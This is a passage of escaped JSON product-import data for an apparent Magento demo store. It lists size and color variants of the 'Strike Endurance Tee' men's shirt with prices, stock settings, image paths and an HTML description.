Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"567\":{\"sku\":\"MS08-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-M-Blue\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"568\":{\"sku\":\"MS08-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-M-Red\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"569\":{\"sku\":\"MS08-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-L-Black\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"570\":{\"sku\":\"MS08-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-L-Blue\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"571\":{\"sku\":\"MS08-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-L-Red\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"572\":{\"sku\":\"MS08-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-XL-Black\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"573\":{\"sku\":\"MS08-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-XL-Blue\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"574\":{\"sku\":\"MS08-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-XL-Red\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"575\":{\"sku\":\"MS08\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, 